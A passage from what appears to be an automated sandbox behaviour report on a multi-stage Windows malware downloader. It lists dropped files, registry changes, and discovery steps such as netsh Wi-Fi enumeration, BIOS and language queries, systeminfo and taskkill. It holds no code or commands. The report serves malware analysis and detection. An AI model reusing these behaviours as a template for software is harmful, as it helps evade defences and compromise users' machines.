| File opened for modification | C:\Windows\JpgCelebrity | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe | N/A |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
Browser Information Discovery
Command and Scripting Interpreter: JavaScript
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Embeds OpenSSL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysnldcvmr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3076928777.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133786810330824482" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).bottom = "968" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).top = "260" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).right = "1556" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1920x1080x96(1).x = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).top = "327" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\MuiCache | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1920x1080x96(1).y = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1920x1080x96(1).x = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1920x1080x96(1).y = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000c31c8bd7af18db019ca068d0c318db01331211f7644edb0114000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).left = "417" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\NodeSlot = "9" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
